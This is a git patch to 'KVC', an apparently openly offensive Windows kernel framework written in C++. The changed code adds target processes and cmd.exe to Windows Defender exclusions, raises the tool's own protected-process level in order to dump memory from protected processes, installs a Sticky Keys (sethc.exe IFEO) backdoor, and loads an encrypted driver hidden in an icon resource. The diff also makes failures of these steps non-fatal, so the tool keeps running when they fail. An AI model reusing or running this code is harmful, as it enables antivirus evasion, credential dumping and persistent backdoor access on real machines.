From a84cb5ba92f46335b82f0fb04fea1b942eeaa8c7 Mon Sep 17 00:00:00 2001 From: wesmar Date: Thu, 18 Sep 2025 23:42:08 +0200 Subject: [PATCH] Overwrite content --- README.md | 8 --- kvc/Controller.h | 3 +- kvc/ControllerCore.cpp | 1 + kvc/ControllerDriverManager.cpp | 56 +++++++++++++++++- kvc/ControllerMemoryOperations.cpp | 91 ++++++++++++++++-------------- kvc/TrustedInstallerIntegrator.cpp | 16 +++--- kvc/Utils.cpp | 25 ++++++++ 7 files changed, 141 insertions(+), 59 deletions(-) diff --git a/README.md b/README.md index dbf4a5f..2f179c7 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,3 @@ -
-

- IMPORTANT NOTICE — DO NOT DOWNLOAD THE BINARY TODAY (18.09.2025 / SEPTEMBER 18, 2025) -

-

- FULL WINDOWS 10 SUPPORT IS BEING DEPLOYED AND A LEGACY-TYPE COMPILATION IS CURRENTLY BEING GENERATED IN THE BACKGROUND. DOWNLOADING THE CURRENT BINARY MAY CAUSE INSTABILITY OR INCOMPATIBILITY. PLEASE WAIT FOR THE STABLE RELEASE. -

-
# KVC - Kernel Vulnerability Capabilities Framework
diff --git a/kvc/Controller.h b/kvc/Controller.h index 7b6ccfd..658cb42 100644 --- a/kvc/Controller.h +++ b/kvc/Controller.h @@ -171,7 +171,8 @@ private: std::vector& kvcCryptData) noexcept; // Atomic driver operations for stability - bool EnsureDriverAvailable() noexcept; + bool ForceRemoveService() noexcept; + bool EnsureDriverAvailable() noexcept; bool IsDriverCurrentlyLoaded() noexcept; bool PerformAtomicInit() noexcept; bool PerformAtomicInitWithErrorCleanup() noexcept; diff --git a/kvc/ControllerCore.cpp b/kvc/ControllerCore.cpp index 8b0ff48..c3a5a9e 100644 --- a/kvc/ControllerCore.cpp +++ b/kvc/ControllerCore.cpp @@ -129,6 +129,7 @@ bool Controller::PerformAtomicInitWithErrorCleanup() noexcept { // Core driver availability check with fallback mechanisms bool Controller::EnsureDriverAvailable() noexcept { // Phase 1: Check if the driver is already available (without testing) + ForceRemoveService(); if (IsDriverCurrentlyLoaded()) { return true; } diff --git a/kvc/ControllerDriverManager.cpp b/kvc/ControllerDriverManager.cpp index 8e88260..8d3c703 100644 --- a/kvc/ControllerDriverManager.cpp +++ b/kvc/ControllerDriverManager.cpp @@ -1,3 +1,28 @@ +/******************************************************************************* + _ ____ ______ + | |/ /\ \ / / ___| + | ' / \ \ / / | + | . \ \ V /| |___ + |_|\_\ \_/ \____| + +The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, +offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived +as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation +of kernel-level primitives** for legitimate security research and penetration testing. + +KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows +security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware +Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures +that define these protections. + + ----------------------------------------------------------------------------- + Author : Marek Wesołowski + Email : marek@wesolowski.eu.org + Phone : +48 607 440 283 (Tel/WhatsApp) + Date : 04-09-2025 + +*******************************************************************************/ + // ControllerDriverManager.cpp #include "Controller.h" #include "common.h" @@ -7,6 +32,33 @@ namespace fs = std::filesystem; +bool Controller::ForceRemoveService() noexcept { + if (!InitDynamicAPIs()) { + return false; + } + + SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ALL_ACCESS); + if (!hSCM) { + return false; + } + + SC_HANDLE hService = g_pOpenServiceW(hSCM, GetServiceName().c_str(), DELETE); + if (!hService) { + DWORD err = GetLastError(); + CloseServiceHandle(hSCM); + return (err == ERROR_SERVICE_DOES_NOT_EXIST); + } + + BOOL success = g_pDeleteService(hService); + DWORD err = GetLastError(); + + CloseServiceHandle(hService); + CloseServiceHandle(hSCM); + + return success || (err == ERROR_SERVICE_MARKED_FOR_DELETE); +} + + // Driver service lifecycle management bool Controller::StopDriverService() noexcept { DEBUG(L"StopDriverService called"); @@ -90,7 +142,8 @@ std::vector Controller::DecryptDriver(const std::vector& encryptedDa // Silent driver installation with TrustedInstaller privileges bool Controller::InstallDriverSilently() noexcept { - auto encryptedData = ExtractEncryptedDriver(); + ForceRemoveService(); + auto encryptedData = ExtractEncryptedDriver(); if (encryptedData.empty()) return false; auto driverData = DecryptDriver(encryptedData); @@ -184,6 +237,7 @@ bool Controller::StartDriverServiceSilent() noexcept { // Legacy driver installation with enhanced error handling bool Controller::InstallDriver() noexcept { + ForceRemoveService(); auto encryptedData = ExtractEncryptedDriver(); if (encryptedData.empty()) { ERROR(L"Failed to extract encrypted driver from icon resource"); diff --git a/kvc/ControllerMemoryOperations.cpp b/kvc/ControllerMemoryOperations.cpp index 230599e..4d515a1 100644 --- a/kvc/ControllerMemoryOperations.cpp +++ b/kvc/ControllerMemoryOperations.cpp @@ -80,12 +80,15 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc std::wstring processName = Utils::GetProcessName(pid); - // Add process to Defender exclusions to prevent interference during dumping - std::wstring processNameWithExt = processName; - if (processNameWithExt.find(L".exe") == std::wstring::npos) { - processNameWithExt += L".exe"; - } - m_trustedInstaller.AddProcessToDefenderExclusions(processName); + // Try to add process to Defender exclusions to prevent interference during dumping + std::wstring processNameWithExt = processName; + if (processNameWithExt.find(L".exe") == std::wstring::npos) { + processNameWithExt += L".exe"; + } + + if (!m_trustedInstaller.AddProcessToDefenderExclusions(processName)) { + INFO(L"AV exclusion skipped: %s", processName.c_str()); + } // System process validation - these processes cannot be dumped if (pid == 4 || processName == L"System") { @@ -128,21 +131,18 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Get target process protection level for elevation + // Get target process protection level for elevation - this is auxiliary auto kernelAddr = GetProcessKernelAddress(pid); if (!kernelAddr) { - ERROR(L"Failed to get kernel address for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + INFO(L"Could not get kernel address for target process (continuing without self-protection)"); } - auto targetProtection = GetProcessProtection(kernelAddr.value()); - if (!targetProtection) { - ERROR(L"Failed to get protection info for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + auto targetProtection = std::optional{}; + if (kernelAddr) { + targetProtection = GetProcessProtection(kernelAddr.value()); + if (!targetProtection) { + INFO(L"Could not get protection info for target process (continuing without self-protection)"); + } } if (g_interrupted) { @@ -152,13 +152,13 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Protection elevation to match target process level - if (targetProtection.value() > 0) { + // Protection elevation to match target process level - auxiliary feature + if (targetProtection && targetProtection.value() > 0) { UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value()); UCHAR targetSigner = Utils::GetSignerType(targetProtection.value()); std::wstring levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL"; - std::wstring signerStr; + std::wstring signerStr = L"Unknown"; switch (static_cast(targetSigner)) { case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break; @@ -170,25 +170,26 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break; case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break; default: - ERROR(L"Unknown signer type for target process"); - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); - PerformAtomicCleanup(); - return false; + INFO(L"Unknown signer type - skipping self-protection"); + break; } - INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str()); + if (signerStr != L"Unknown") { + INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str()); - if (!SelfProtect(levelStr, signerStr)) { - ERROR(L"Failed to set self protection to %s-%s", levelStr.c_str(), signerStr.c_str()); - } else { - SUCCESS(L"Set self protection to %s-%s", levelStr.c_str(), signerStr.c_str()); + if (!SelfProtect(levelStr, signerStr)) { + INFO(L"Self-protection failed: %s-%s (continuing with dump)", levelStr.c_str(), signerStr.c_str()); + } else { + SUCCESS(L"Self-protection set to %s-%s", levelStr.c_str(), signerStr.c_str()); + } } } else { INFO(L"Target process is not protected, no self-protection needed"); } + // Try to enable debug privilege - auxiliary feature if (!EnableDebugPrivilege()) { - ERROR(L"Failed to enable debug privilege"); + INFO(L"Debug privilege failed (continuing with dump anyway)"); } if (g_interrupted) { @@ -199,12 +200,12 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return false; } - // Open target process with appropriate privileges + // Open target process with appropriate privileges - CRITICAL operation HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); if (!hProcess) { hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); if (!hProcess) { - ERROR(L"Failed to open process (error: %d)", GetLastError()); + ERROR(L"Critical: Failed to open process (error: %d)", GetLastError()); m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); PerformAtomicCleanup(); return false; @@ -217,9 +218,10 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc fullPath += L"\\"; fullPath += processName + L"_" + std::to_wstring(pid) + L".dmp"; + // Create dump file - CRITICAL operation HANDLE hFile = CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { - ERROR(L"Failed to create dump file (error: %d)", GetLastError()); + ERROR(L"Critical: Failed to create dump file (error: %d)", GetLastError()); CloseHandle(hProcess); m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); PerformAtomicCleanup(); @@ -249,6 +251,7 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc INFO(L"Creating memory dump - this may take a while. Press Ctrl+C to cancel safely."); + // Execute the actual memory dump - CRITICAL operation BOOL result = MiniDumpWriteDump(hProcess, pid, hFile, dumpType, NULL, NULL, NULL); if (g_interrupted) { @@ -269,19 +272,19 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc DWORD error = GetLastError(); switch (error) { case ERROR_TIMEOUT: - ERROR(L"MiniDumpWriteDump timed out - process may be unresponsive or in critical section"); + ERROR(L"Critical: MiniDumpWriteDump timed out - process may be unresponsive or in critical section"); break; case RPC_S_CALL_FAILED: - ERROR(L"RPC call failed - process may be a kernel-mode or system-critical process"); + ERROR(L"Critical: RPC call failed - process may be a kernel-mode or system-critical process"); break; case ERROR_ACCESS_DENIED: - ERROR(L"Access denied - insufficient privileges even with protection bypass"); + ERROR(L"Critical: Access denied - insufficient privileges even with protection bypass"); break; case ERROR_PARTIAL_COPY: - ERROR(L"Partial copy - some memory regions could not be read"); + ERROR(L"Critical: Partial copy - some memory regions could not be read"); break; default: - ERROR(L"MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error); + ERROR(L"Critical: MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error); break; } DeleteFileW(fullPath.c_str()); @@ -293,8 +296,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc SUCCESS(L"Memory dump created successfully: %s", fullPath.c_str()); + // Cleanup phase - these operations are non-critical INFO(L"Removing self-protection before cleanup..."); - SelfProtect(L"none", L"none"); + if (!SelfProtect(L"none", L"none")) { + DEBUG(L"Self-protection removal failed (non-critical)"); + } if (g_interrupted) { INFO(L"Operation completed but cleanup was interrupted"); @@ -303,8 +309,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc return true; } - // Clean up Defender exclusions and perform atomic cleanup - m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName); + // Clean up Defender exclusions and perform atomic cleanup - non-critical + if (!m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName)) { + DEBUG(L"AV cleanup skipped: %s", processName.c_str()); + } + PerformAtomicCleanup(); return true; diff --git a/kvc/TrustedInstallerIntegrator.cpp b/kvc/TrustedInstallerIntegrator.cpp index 9d36d69..16abdbe 100644 --- a/kvc/TrustedInstallerIntegrator.cpp +++ b/kvc/TrustedInstallerIntegrator.cpp @@ -247,7 +247,7 @@ bool TrustedInstallerIntegrator::AddDefenderExclusion(ExclusionType type, const if (result) { SUCCESS(L"Successfully added to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); } else { - ERROR(L"Failed to add to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); + INFO(L"AV exclusion skipped: %s %s", typeStr.c_str(), processedValue.c_str()); } return result; @@ -287,7 +287,7 @@ bool TrustedInstallerIntegrator::RemoveDefenderExclusion(ExclusionType type, con if (result) { SUCCESS(L"Successfully removed from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); } else { - ERROR(L"Failed to remove from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str()); + INFO(L"AV cleanup skipped: %s %s", typeStr.c_str(), processedValue.c_str()); } return result; @@ -403,8 +403,8 @@ bool TrustedInstallerIntegrator::InstallStickyKeysBackdoor() noexcept // First add cmd.exe to Defender process exclusions to prevent detection if (!AddProcessToDefenderExclusions(L"cmd.exe")) { - ERROR(L"Failed to add cmd.exe to Defender process exclusions"); - return false; + INFO(L"AV exclusion skipped for cmd.exe (continuing)"); + } // Create IFEO registry entry for sethc.exe @@ -459,8 +459,8 @@ bool TrustedInstallerIntegrator::RemoveStickyKeysBackdoor() noexcept // Remove cmd.exe from Defender process exclusions if (!RemoveProcessFromDefenderExclusions(L"cmd.exe")) { - ERROR(L"Failed to remove cmd.exe from Defender process exclusions"); - success = false; + INFO(L"AV cleanup skipped for cmd.exe"); + } if (success) { @@ -610,7 +610,7 @@ bool TrustedInstallerIntegrator::AddProcessToDefenderExclusions(const std::wstri if (result) { SUCCESS(L"Successfully added to Windows Defender process exclusions: %s", processName.c_str()); } else { - ERROR(L"Failed to add to Windows Defender process exclusions: %s", processName.c_str()); + INFO(L"AV exclusion skipped: %s", processName.c_str()); } return result; @@ -635,7 +635,7 @@ bool TrustedInstallerIntegrator::RemoveProcessFromDefenderExclusions(const std:: if (result) { SUCCESS(L"Successfully removed from Windows Defender process exclusions: %s", processName.c_str()); } else { - ERROR(L"Failed to remove from Windows Defender process exclusions: %s", processName.c_str()); + INFO(L"AV cleanup skipped: %s", processName.c_str()); } return result; diff --git a/kvc/Utils.cpp b/kvc/Utils.cpp index aac9ab7..6a43095 100644 --- a/kvc/Utils.cpp +++ b/kvc/Utils.cpp @@ -1,3 +1,28 @@ +/******************************************************************************* + _ ____ ______ + | |/ /\ \ / / ___| + | ' / \ \ / / | + | . \ \ V /| |___ + |_|\_\ \_/ \____| + +The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, +offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived +as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation +of kernel-level primitives** for legitimate security research and penetration testing. + +KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows +security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware +Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures +that define these protections. + + ----------------------------------------------------------------------------- + Author : Marek Wesołowski + Email : marek@wesolowski.eu.org + Phone : +48 607 440 283 (Tel/WhatsApp) + Date : 04-09-2025 + +*******************************************************************************/ + // Utils.cpp - Fixed compilation issues with NtQuerySystemInformation #include "Utils.h" #include "common.h"